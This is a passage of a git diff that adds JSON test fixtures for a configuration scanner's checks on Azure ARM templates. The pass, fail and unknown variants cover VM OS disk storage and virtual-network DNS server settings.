+              "createOption": "Empty",
+              "managedDisk": {
+                "storageAccountType": "Standard_LRS"
+              },
+              "vhd": {
+                "uri": "someURI"
+              }
+            }
+          ]
+        },
+        "osProfile": {
+          "computerName": "hostname",
+          "adminUsername": "testadmin",
+          "adminPassword": "1111"
+        },
+        "networkProfile": {
+          "networkInterfaces": [
+            {
+              "id": "[resourceId('Microsoft.Network/networkInterfaces', 'main')]"
+            }
+          ]
+        }
+      },
+      "tags": {
+        "environment": "staging"
+      }
+    }
+  ],
+  "parameters": {
+    "prefix": {
+      "type": "string",
+      "defaultValue": "myprefix"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_VMStorageOsDisk/pass.json b/tests/arm/checks/resource/example_VMStorageOsDisk/pass.json
new file mode 100644
index 00000000000..5f2003adf39
--- /dev/null
+++ b/tests/arm/checks/resource/example_VMStorageOsDisk/pass.json
@@ -0,0 +1,54 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Compute/virtualMachines",
+      "apiVersion": "2021-07-01",
+      "name": "pass-linux",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "hardwareProfile": {
+          "vmSize": "Standard_DS1_v2"
+        },
+        "storageProfile": {
+          "imageReference": {
+            "publisher": "Canonical",
+            "offer": "UbuntuServer",
+            "sku": "16.04-LTS",
+            "version": "latest"
+          },
+          "osDisk": {
+            "name": "myosdisk1",
+            "caching": "ReadWrite",
+            "createOption": "FromImage",
+            "managedDisk": {
+              "storageAccountType": "Standard_LRS"
+            }
+          }
+        },
+        "osProfile": {
+          "computerName": "hostname",
+          "adminUsername": "testadmin",
+          "adminPassword": "1111"
+        },
+        "networkProfile": {
+          "networkInterfaces": [
+            {
+              "id": "[resourceId('Microsoft.Network/networkInterfaces', 'main')]"
+            }
+          ]
+        }
+      },
+      "tags": {
+        "environment": "staging"
+      }
+    }
+  ],
+  "parameters": {
+    "prefix": {
+      "type": "string",
+      "defaultValue": "myprefix"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_VMStorageOsDisk/pass2.json b/tests/arm/checks/resource/example_VMStorageOsDisk/pass2.json
new file mode 100644
index 00000000000..230334fb43f
--- /dev/null
+++ b/tests/arm/checks/resource/example_VMStorageOsDisk/pass2.json
@@ -0,0 +1,54 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Compute/virtualMachines",
+      "apiVersion": "2021-07-01",
+      "name": "pass-windows",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "hardwareProfile": {
+          "vmSize": "Standard_DS1_v2"
+        },
+        "storageProfile": {
+          "imageReference": {
+            "publisher": "MicrosoftWindowsServer",
+            "offer": "WindowsServer",
+            "sku": "2019-Datacenter",
+            "version": "latest"
+          },
+          "osDisk": {
+            "name": "myosdisk2",
+            "caching": "ReadWrite",
+            "createOption": "FromImage",
+            "managedDisk": {
+              "storageAccountType": "Standard_LRS"
+            }
+          }
+        },
+        "osProfile": {
+          "computerName": "hostname",
+          "adminUsername": "testadmin",
+          "adminPassword": "1111"
+        },
+        "networkProfile": {
+          "networkInterfaces": [
+            {
+              "id": "[resourceId('Microsoft.Network/networkInterfaces', 'main')]"
+            }
+          ]
+        }
+      },
+      "tags": {
+        "environment": "staging"
+      }
+    }
+  ],
+  "parameters": {
+    "prefix": {
+      "type": "string",
+      "defaultValue": "myprefix"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_VnetLocalDNS/fail.json b/tests/arm/checks/resource/example_VnetLocalDNS/fail.json
new file mode 100644
index 00000000000..186e6a1ae03
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetLocalDNS/fail.json
@@ -0,0 +1,73 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string",
+      "metadata": {
+        "Description": "The region to deploy the resources into"
+      }
+    },
+    "virtualNetworkName": {
+      "type": "string",
+      "metadata": {
+        "Description": "The name of the Virtual Network"
+      }
+    },
+    "virtualNetworkAddressRange": {
+      "type": "string",
+      "metadata": {
+        "Description": "The address range of the virtual network in CIDR format"
+      },
+      "defaultValue": "10.0.0.0/16"
+    },
+    "virtualNetworkSubnetaddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The subnet definition for the virtual network"
+      }
+    },
+    "dnsAddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The DNS address(es) of the DNS Server(s) used by the virtual network"
+      }
+    }
+  },
+  "resources": [
+    {
+      "name": "fail",
+      "type": "Microsoft.Network/virtualNetworks",
+      "location": "[parameters('location')]",
+      "apiVersion": "2018-02-01",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "10.0.0.0/16"
+          ]
+        },
+        "dhcpOptions": {
+          "dnsServers": [
+            "8.8.8.8"
+          ]
+        },
+        "subnets": [
+          {
+            "name": "subnet1",
+            "properties": {
+              "addressPrefix": "10.0.1.0/24"
+            }
+          },
+          {
+            "name": "subnet2",
+            "properties": {
+              "addressPrefix": "10.0.2.0/24"
+            }
+          }
+        ]
+      }
+    }
+  ],
+  "outputs": {}
+}
+
diff --git a/tests/arm/checks/resource/example_VnetLocalDNS/fail2.json b/tests/arm/checks/resource/example_VnetLocalDNS/fail2.json
new file mode 100644
index 00000000000..ccf269672a4
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetLocalDNS/fail2.json
@@ -0,0 +1,73 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string",
+      "metadata": {
+        "Description": "The region to deploy the resources into"
+      }
+    },
+    "virtualNetworkName": {
+      "type": "string",
+      "metadata": {
+        "Description": "The name of the Virtual Network"
+      }
+    },
+    "virtualNetworkAddressRange": {
+      "type": "string",
+      "metadata": {
+        "Description": "The address range of the virtual network in CIDR format"
+      },
+      "defaultValue": "10.0.0.0/16"
+    },
+    "virtualNetworkSubnetaddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The subnet definition for the virtual network"
+      }
+    },
+    "dnsAddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The DNS address(es) of the DNS Server(s) used by the virtual network"
+      }
+    }
+  },
+  "resources": [
+    {
+      "name": "fail2",
+      "type": "Microsoft.Network/virtualNetworks",
+      "location": "[parameters('location')]",
+      "apiVersion": "2018-02-01",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "10.0.0.0/16"
+          ]
+        },
+        "dhcpOptions": {
+          "dnsServers": [
+            []
+          ]
+        },
+        "subnets": [
+          {
+            "name": "subnet1",
+            "properties": {
+              "addressPrefix": "10.0.1.0/24"
+            }
+          },
+          {
+            "name": "subnet2",
+            "properties": {
+              "addressPrefix": "10.0.2.0/24"
+            }
+          }
+        ]
+      }
+    }
+  ],
+  "outputs": {}
+}
+
diff --git a/tests/arm/checks/resource/example_VnetLocalDNS/fail3.json b/tests/arm/checks/resource/example_VnetLocalDNS/fail3.json
new file mode 100644
index 00000000000..ca674a42d4d
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetLocalDNS/fail3.json
@@ -0,0 +1,71 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string",
+      "metadata": {
+        "Description": "The region to deploy the resources into"
+      }
+    },
+    "virtualNetworkName": {
+      "type": "string",
+      "metadata": {
+        "Description": "The name of the Virtual Network"
+      }
+    },
+    "virtualNetworkAddressRange": {
+      "type": "string",
+      "metadata": {
+        "Description": "The address range of the virtual network in CIDR format"
+      },
+      "defaultValue": "10.0.0.0/16"
+    },
+    "virtualNetworkSubnetaddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The subnet definition for the virtual network"
+      }
+    },
+    "dnsAddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The DNS address(es) of the DNS Server(s) used by the virtual network"
+      }
+    }
+  },
+  "resources": [
+    {
+      "name": "fail3",
+      "type": "Microsoft.Network/virtualNetworks",
+      "location": "[parameters('location')]",
+      "apiVersion": "2018-02-01",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": []
+        },
+        "dhcpOptions": {
+          "dnsServers": [
+            "8.8.8.8"
+          ]
+        },
+        "subnets": [
+          {
+            "name": "subnet1",
+            "properties": {
+              "addressPrefix": "10.0.1.0/24"
+            }
+          },
+          {
+            "name": "subnet2",
+            "properties": {
+              "addressPrefix": "10.0.2.0/24"
+            }
+          }
+        ]
+      }
+    }
+  ],
+  "outputs": {}
+}
+
diff --git a/tests/arm/checks/resource/example_VnetLocalDNS/pass.json b/tests/arm/checks/resource/example_VnetLocalDNS/pass.json
new file mode 100644
index 00000000000..76211227fa3
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetLocalDNS/pass.json
@@ -0,0 +1,74 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string",
+      "metadata": {
+        "Description": "The region to deploy the resources into"
+      }
+    },
+    "virtualNetworkName": {
+      "type": "string",
+      "metadata": {
+        "Description": "The name of the Virtual Network"
+      }
+    },
+    "virtualNetworkAddressRange": {
+      "type": "string",
+      "metadata": {
+        "Description": "The address range of the virtual network in CIDR format"
+      },
+      "defaultValue": "10.0.0.0/16"
+    },
+    "virtualNetworkSubnetaddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The subnet definition for the virtual network"
+      }
+    },
+    "dnsAddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The DNS address(es) of the DNS Server(s) used by the virtual network"
+      }
+    }
+  },
+  "resources": [
+    {
+      "name": "pass",
+      "type": "Microsoft.Network/virtualNetworks",
+      "location": "[parameters('location')]",
+      "apiVersion": "2018-02-01",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "10.0.0.0/16"
+          ]
+        },
+        "dhcpOptions": {
+          "dnsServers": [
+            "10.0.0.4",
+            "10.0.0.5"
+          ]
+        },
+        "subnets": [
+          {
+            "name": "subnet1",
+            "properties": {
+              "addressPrefix": "10.0.1.0/24"
+            }
+          },
+          {
+            "name": "subnet2",
+            "properties": {
+              "addressPrefix": "10.0.2.0/24"
+            }
+          }
+        ]
+      }
+    }
+  ],
+  "outputs": {}
+}
+
diff --git a/tests/arm/checks/resource/example_VnetLocalDNS/pass2.json b/tests/arm/checks/resource/example_VnetLocalDNS/pass2.json
new file mode 100644
index 00000000000..4e39df0c5f3
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetLocalDNS/pass2.json
@@ -0,0 +1,70 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string",
+      "metadata": {
+        "Description": "The region to deploy the resources into"
+      }
+    },
+    "virtualNetworkName": {
+      "type": "string",
+      "metadata": {
+        "Description": "The name of the Virtual Network"
+      }
+    },
+    "virtualNetworkAddressRange": {
+      "type": "string",
+      "metadata": {
+        "Description": "The address range of the virtual network in CIDR format"
+      },
+      "defaultValue": "10.0.0.0/16"
+    },
+    "virtualNetworkSubnetaddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The subnet definition for the virtual network"
+      }
+    },
+    "dnsAddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The DNS address(es) of the DNS Server(s) used by the virtual network"
+      }
+    }
+  },
+  "resources": [
+    {
+      "name": "pass2",
+      "type": "Microsoft.Network/virtualNetworks",
+      "location": "[parameters('location')]",
+      "apiVersion": "2018-02-01",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "10.0.0.0/16"
+          ]
+        },
+        "dhcpOptions": {
+        },
+        "subnets": [
+          {
+            "name": "subnet1",
+            "properties": {
+              "addressPrefix": "10.0.1.0/24"
+            }
+          },
+          {
+            "name": "subnet2",
+            "properties": {
+              "addressPrefix": "10.0.2.0/24"
+            }
+          }
+        ]
+      }
+    }
+  ],
+  "outputs": {}
+}
+
diff --git a/tests/arm/checks/resource/example_VnetLocalDNS/unknown.json b/tests/arm/checks/resource/example_VnetLocalDNS/unknown.json
new file mode 100644
index 00000000000..74ac255c862
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetLocalDNS/unknown.json
@@ -0,0 +1,74 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string",
+      "metadata": {
+        "Description": "The region to deploy the resources into"
+      }
+    },
+    "virtualNetworkName": {
+      "type": "string",
+      "metadata": {
+        "Description": "The name of the Virtual Network"
+      }
+    },
+    "virtualNetworkAddressRange": {
+      "type": "string",
+      "metadata": {
+        "Description": "The address range of the virtual network in CIDR format"
+      },
+      "defaultValue": "10.0.0.0/16"
+    },
+    "virtualNetworkSubnetaddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The subnet definition for the virtual network"
+      }
+    },
+    "dnsAddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The DNS address(es) of the DNS Server(s) used by the virtual network"
+      }
+    }
+  },
+  "resources": [
+    {
+      "name": "unknown",
+      "type": "Microsoft.Network/virtualNetworks",
+      "location": "[parameters('location')]",
+      "apiVersion": "2018-02-01",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "v"
+          ]
+        },
+        "dhcpOptions": {
+          "dnsServers": [
+            "10.0.0.4",
+            "10.0.0.5"
+          ]
+        },
+        "subnets": [
+          {
+            "name": "subnet1",
+            "properties": {
+              "addressPrefix": "10.0.1.0/24"
+            }
+          },
+          {
+            "name": "subnet2",
+            "properties": {
+              "addressPrefix": "10.0.2.0/24"
+            }
+          }
+        ]
+      }
+    }
+  ],
+  "outputs": {}
+}
+
diff --git a/tests/arm/checks/resource/example_VnetLocalDNS/unknown2.json b/tests/arm/checks/resource/example_VnetLocalDNS/unknown2.json
new file mode 100644
index 00000000000..297206f797c
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetLocalDNS/unknown2.json
@@ -0,0 +1,73 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string",
+      "metadata": {
+        "Description": "The region to deploy the resources into"
+      }
+    },
+    "virtualNetworkName": {
+      "type": "string",
+      "metadata": {
+        "Description": "The name of the Virtual Network"
+      }
+    },
+    "virtualNetworkAddressRange": {
+      "type": "string",
+      "metadata": {
+        "Description": "The address range of the virtual network in CIDR format"
+      },
+      "defaultValue": "10.0.0.0/16"
+    },
+    "virtualNetworkSubnetaddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The subnet definition for the virtual network"
+      }
+    },
+    "dnsAddress": {
+      "type": "array",
+      "metadata": {
+        "Description": "The DNS address(es) of the DNS Server(s) used by the virtual network"
+      }
+    }
+  },
+  "resources": [
+    {
+      "name": "unknown2",
+      "type": "Microsoft.Network/virtualNetworks",
+      "location": "[parameters('location')]",
+      "apiVersion": "2018-02-01",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "10.0.0.0/16"
+          ]
+        },
+        "dhcpOptions": {
+          "dnsServers": [
+            "var.unknown"
+          ]
+        },
+        "subnets": [
+          {
+            "name": "subnet1",
+            "properties": {
+              "addressPrefix": "10.0.1.0/24"
+            }
+          },
+          {
+            "name": "subnet2",
+            "properties": {
+              "addressPrefix": "10.0.2.0/24"
+            }
+          }
+        ]
+      }
+    }
+  ],
+  "outputs": {}
+}
+
diff --git a/tests/arm/checks/resource/example_VnetSingleDNSServer/fail.json b/tests/arm/checks/resource/example_VnetSingleDNSServer/fail.json
new file mode 100644
index 00000000000..3f849c137cb
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetSingleDNSServer/fail.json
@@ -0,0 +1,96 @@
+{
+  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string"
+    },
+    "osDiskType": {
+      "type": "string"
+    },
+    "addressPrefixes": {
+      "type": "array"
+    },
+    "subnets": {
+      "type": "array"
+    },
+    "virtualNetworkId": {
+      "type": "string"
+    },
+    "virtualNetworkName": {
+      "type": "string"
+    },
+    "networkSecurityGroups": {
+      "type": "array"
+    },
+    "networkInterfaceConfigurations": {
+      "type": "array"
+    },
+    "vmName": {
+      "type": "string"
+    },
+    "virtualMachineScaleSetName": {
+      "type": "string"
+    },
+    "instanceCount": {
+      "type": "string"
+    },
+    "instanceSize": {
+      "type": "string"
+    },
+    "adminUsername": {
+      "type": "string"
+    },
+    "securityType": {
+      "type": "string"
+    },
+    "secureBoot": {
+      "type": "bool"
+    },
+    "vTPM": {
+      "type": "bool"
+    },
+    "platformFaultDomainCount": {
+      "type": "string"
+    }
+  },
+  "variables": {
+    "storageApiVersion": "2021-01-01",
+    "networkApiVersion": "2020-11-01",
+    "virtualMachineScaleSetApiVersion": "2023-03-01",
+    "namingInfix": "[toLower(substring(concat(parameters('virtualMachineScaleSetName'), uniqueString(resourceGroup().id)), 0, 9))]"
+  },
+  "resources": [
+    {
+      "name": "fail",
+      "type": "Microsoft.Network/networkInterfaces",
+      "apiVersion": "2022-11-01",
+      "location": "[parameters('location')]",
+      "dependsOn": [],
+      "properties": {
+        "ipConfigurations": [
+          {
+            "name": "ipconfig1",
+            "properties": {
+              "subnet": {
+                "id": "[variables('subnetRef')]"
+              },
+              "privateIPAllocationMethod": "Dynamic"
+            }
+          }
+        ],
+        "dnsSettings": {
+          "dnsServers": [
+            "10.0.0.4"
+          ]
+        }
+      }
+    }
+  ],
+  "outputs": {
+    "adminUsername": {
+      "type": "string",
+      "value": "[parameters('adminUsername')]"
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_VnetSingleDNSServer/fail2.json b/tests/arm/checks/resource/example_VnetSingleDNSServer/fail2.json
new file mode 100644
index 00000000000..5b8d30f4719
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetSingleDNSServer/fail2.json
@@ -0,0 +1,96 @@
+{
+  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string"
+    },
+    "osDiskType": {
+      "type": "string"
+    },
+    "addressPrefixes": {
+      "type": "array"
+    },
+    "subnets": {
+      "type": "array"
+    },
+    "virtualNetworkId": {
+      "type": "string"
+    },
+    "virtualNetworkName": {
+      "type": "string"
+    },
+    "networkSecurityGroups": {
+      "type": "array"
+    },
+    "networkInterfaceConfigurations": {
+      "type": "array"
+    },
+    "vmName": {
+      "type": "string"
+    },
+    "virtualMachineScaleSetName": {
+      "type": "string"
+    },
+    "instanceCount": {
+      "type": "string"
+    },
+    "instanceSize": {
+      "type": "string"
+    },
+    "adminUsername": {
+      "type": "string"
+    },
+    "securityType": {
+      "type": "string"
+    },
+    "secureBoot": {
+      "type": "bool"
+    },
+    "vTPM": {
+      "type": "bool"
+    },
+    "platformFaultDomainCount": {
+      "type": "string"
+    }
+  },
+  "variables": {
+    "storageApiVersion": "2021-01-01",
+    "networkApiVersion": "2020-11-01",
+    "virtualMachineScaleSetApiVersion": "2023-03-01",
+    "namingInfix": "[toLower(substring(concat(parameters('virtualMachineScaleSetName'), uniqueString(resourceGroup().id)), 0, 9))]"
+  },
+  "resources": [
+    {
+      "name": "fail2",
+      "type": "Microsoft.Network/networkInterfaces",
+      "apiVersion": "2022-11-01",
+      "location": "[parameters('location')]",
+      "dependsOn": [],
+      "properties": {
+        "ipConfigurations": [
+          {
+            "name": "ipconfig1",
+            "properties": {
+              "subnet": {
+                "id": "[variables('subnetRef')]"
+              },
+              "privateIPAllocationMethod": "Dynamic"
+            }
+          }
+        ],
+        "dnsSettings": {
+          "dnsServers": [
+            "10.7.7.2"
+          ]
+        }
+      }
+    }
+  ],
+  "outputs": {
+    "adminUsername": {
+      "type": "string",
+      "value": "[parameters('adminUsername')]"
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_VnetSingleDNSServer/fail3.json b/tests/arm/checks/resource/example_VnetSingleDNSServer/fail3.json
new file mode 100644
index 00000000000..934f9c8c88f
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetSingleDNSServer/fail3.json
@@ -0,0 +1,321 @@
+{
+  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string"
+    },
+    "osDiskType": {
+      "type": "string"
+    },
+    "addressPrefixes": {
+      "type": "array"
+    },
+    "subnets": {
+      "type": "array"
+    },
+    "virtualNetworkId": {
+      "type": "string"
+    },
+    "virtualNetworkName": {
+      "type": "string"
+    },
+    "networkSecurityGroups": {
+      "type": "array"
+    },
+    "networkInterfaceConfigurations": {
+      "type": "array"
+    },
+    "vmName": {
+      "type": "string"
+    },
+    "virtualMachineScaleSetName": {
+      "type": "string"
+    },
+    "instanceCount": {
+      "type": "string"
+    },
+    "instanceSize": {
+      "type": "string"
+    },
+    "adminUsername": {
+      "type": "string"
+    },
+    "securityType": {
+      "type": "string"
+    },
+    "secureBoot": {
+      "type": "bool"
+    },
+    "vTPM": {
+      "type": "bool"
+    },
+    "platformFaultDomainCount": {
+      "type": "string"
+    }
+  },
+  "variables": {
+    "storageApiVersion": "2021-01-01",
+    "networkApiVersion": "2020-11-01",
+    "virtualMachineScaleSetApiVersion": "2023-03-01",
+    "namingInfix": "[toLower(substring(concat(parameters('virtualMachineScaleSetName'), uniqueString(resourceGroup().id)), 0, 9))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Network/virtualNetworks",
+      "apiVersion": "2023-11-01",
+      "name": "fail3",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "extendedLocation": {
+        "name": "string",
+        "type": "EdgeZone"
+      },
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "string"
+          ]
+        },
+        "bgpCommunities": {
+          "virtualNetworkCommunity": "string"
+        },
+        "ddosProtectionPlan": {
+          "id": "string"
+        },
+        "dhcpOptions": {
+          "dnsServers": [
+            "10.0.0.4"
+          ]
+        },
+        "enableDdosProtection": "bool",
+        "enableVmProtection": "bool",
+        "encryption": {
+          "enabled": "bool",
+          "enforcement": "string"
+        },
+        "flowTimeoutInMinutes": "int",
+        "ipAllocations": [
+          {
+            "id": "string"
+          }
+        ],
+        "subnets": [
+          {
+            "id": "string",
+            "name": "string",
+            "properties": {
+              "addressPrefix": "string",
+              "addressPrefixes": [
+                "string"
+              ],
+              "applicationGatewayIPConfigurations": [
+                {
+                  "id": "string",
+                  "name": "string",
+                  "properties": {
+                    "subnet": {
+                      "id": "string"
+                    }
+                  }
+                }
+              ],
+              "defaultOutboundAccess": "bool",
+              "delegations": [
+                {
+                  "id": "string",
+                  "name": "string",
+                  "properties": {
+                    "serviceName": "string"
+                  },
+                  "type": "string"
+                }
+              ],
+              "ipAllocations": [
+                {
+                  "id": "string"
+                }
+              ],
+              "natGateway": {
+                "id": "string"
+              },
+              "networkSecurityGroup": {
+                "id": "string",
+                "location": "string",
+                "properties": {
+                  "flushConnection": "bool",
+                  "securityRules": [
+                    {
+                      "id": "string",
+                      "name": "string",
+                      "properties": {
+                        "access": "string",
+                        "description": "string",
+                        "destinationAddressPrefix": "string",
+                        "destinationAddressPrefixes": [
+                          "string"
+                        ],
+                        "destinationApplicationSecurityGroups": [
+                          {
+                            "id": "string",
+                            "location": "string",
+                            "properties": {},
+                            "tags": {}
+                          }
+                        ],
+                        "destinationPortRange": "string",
+                        "destinationPortRanges": [
+                          "string"
+                        ],
+                        "direction": "string",
+                        "priority": "int",
+                        "protocol": "string",
+                        "sourceAddressPrefix": "string",
+                        "sourceAddressPrefixes": [
+                          "string"
+                        ],
+                        "sourceApplicationSecurityGroups": [
+                          {
+                            "id": "string",
+                            "location": "string",
+                            "properties": {},
+                            "tags": {}
+                          }
+                        ],
+                        "sourcePortRange": "string",
+                        "sourcePortRanges": [
+                          "string"
+                        ]
+                      },
+                      "type": "string"
+                    }
+                  ]
+                },
+                "tags": {}
+              },
+              "privateEndpointNetworkPolicies": "string",
+              "privateLinkServiceNetworkPolicies": "string",
+              "routeTable": {
+                "id": "string",
+                "location": "string",
+                "properties": {
+                  "disableBgpRoutePropagation": "bool",
+                  "routes": [
+                    {
+                      "id": "string",
+                      "name": "string",
+                      "properties": {
+                        "addressPrefix": "string",
+                        "hasBgpOverride": "bool",
+                        "nextHopIpAddress": "string",
+                        "nextHopType": "string"
+                      },
+                      "type": "string"
+                    }
+                  ]
+                },
+                "tags": {}
+              },
+              "serviceEndpointPolicies": [
+                {
+                  "id": "string",
+                  "location": "string",
+                  "properties": {
+                    "contextualServiceEndpointPolicies": [
+                      "string"
+                    ],
+                    "serviceAlias": "string",
+                    "serviceEndpointPolicyDefinitions": [
+                      {
+                        "id": "string",
+                        "name": "string",
+                        "properties": {
+                          "description": "string",
+                          "service": "string",
+                          "serviceResources": [
+                            "string"
+                          ]
+                        },
+                        "type": "string"
+                      }
+                    ]
+                  },
+                  "tags": {}
+                }
+              ],
+              "serviceEndpoints": [
+                {
+                  "locations": [
+                    "string"
+                  ],
+                  "service": "string"
+                }
+              ],
+              "sharingScope": "string"
+            },
+            "type": "string"
+          }
+        ],
+        "virtualNetworkPeerings": [
+          {
+            "id": "string",
+            "name": "string",
+            "properties": {
+              "allowForwardedTraffic": "bool",
+              "allowGatewayTransit": "bool",
+              "allowVirtualNetworkAccess": "bool",
+              "doNotVerifyRemoteGateways": "bool",
+              "enableOnlyIPv6Peering": "bool",
+              "localAddressSpace": {
+                "addressPrefixes": [
+                  "string"
+                ]
+              },
+              "localSubnetNames": [
+                "string"
+              ],
+              "localVirtualNetworkAddressSpace": {
+                "addressPrefixes": [
+                  "string"
+                ]
+              },
+              "peerCompleteVnets": "bool",
+              "peeringState": "string",
+              "peeringSyncLevel": "string",
+              "remoteAddressSpace": {
+                "addressPrefixes": [
+                  "string"
+                ]
+              },
+              "remoteBgpCommunities": {
+                "virtualNetworkCommunity": "string"
+              },
+              "remoteSubnetNames": [
+                "string"
+              ],
+              "remoteVirtualNetwork": {
+                "id": "string"
+              },
+              "remoteVirtualNetworkAddressSpace": {
+                "addressPrefixes": [
+                  "string"
+                ]
+              },
+              "useRemoteGateways": "bool"
+            },
+            "type": "string"
+          }
+        ]
+      }
+    }
+  ],
+  "outputs": {
+    "adminUsername": {
+      "type": "string",
+      "value": "[parameters('adminUsername')]"
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_VnetSingleDNSServer/pass.json b/tests/arm/checks/resource/example_VnetSingleDNSServer/pass.json
new file mode 100644
index 00000000000..02da6257116
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetSingleDNSServer/pass.json
@@ -0,0 +1,97 @@
+{
+  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string"
+    },
+    "osDiskType": {
+      "type": "string"
+    },
+    "addressPrefixes": {
+      "type": "array"
+    },
+    "subnets": {
+      "type": "array"
+    },
+    "virtualNetworkId": {
+      "type": "string"
+    },
+    "virtualNetworkName": {
+      "type": "string"
+    },
+    "networkSecurityGroups": {
+      "type": "array"
+    },
+    "networkInterfaceConfigurations": {
+      "type": "array"
+    },
+    "vmName": {
+      "type": "string"
+    },
+    "virtualMachineScaleSetName": {
+      "type": "string"
+    },
+    "instanceCount": {
+      "type": "string"
+    },
+    "instanceSize": {
+      "type": "string"
+    },
+    "adminUsername": {
+      "type": "string"
+    },
+    "securityType": {
+      "type": "string"
+    },
+    "secureBoot": {
+      "type": "bool"
+    },
+    "vTPM": {
+      "type": "bool"
+    },
+    "platformFaultDomainCount": {
+      "type": "string"
+    }
+  },
+  "variables": {
+    "storageApiVersion": "2021-01-01",
+    "networkApiVersion": "2020-11-01",
+    "virtualMachineScaleSetApiVersion": "2023-03-01",
+    "namingInfix": "[toLower(substring(concat(parameters('virtualMachineScaleSetName'), uniqueString(resourceGroup().id)), 0, 9))]"
+  },
+  "resources": [
+    {
+      "name": "pass",
+      "type": "Microsoft.Network/networkInterfaces",
+      "apiVersion": "2022-11-01",
+      "location": "[parameters('location')]",
+      "dependsOn": [],
+      "properties": {
+        "ipConfigurations": [
+          {
+            "name": "ipconfig1",
+            "properties": {
+              "subnet": {
+                "id": "[variables('subnetRef')]"
+              },
+              "privateIPAllocationMethod": "Dynamic"
+            }
+          }
+        ],
+        "dnsSettings": {
+          "dnsServers": [
+            "10.0.0.4",
+            "10.0.0.5"
+          ]
+        }
+      }
+    }
+  ],
+  "outputs": {
+    "adminUsername": {
+      "type": "string",
+      "value": "[parameters('adminUsername')]"
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_VnetSingleDNSServer/pass2.json b/tests/arm/checks/resource/example_VnetSingleDNSServer/pass2.json
new file mode 100644
index 00000000000..b1ece817bf6
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetSingleDNSServer/pass2.json
@@ -0,0 +1,93 @@
+{
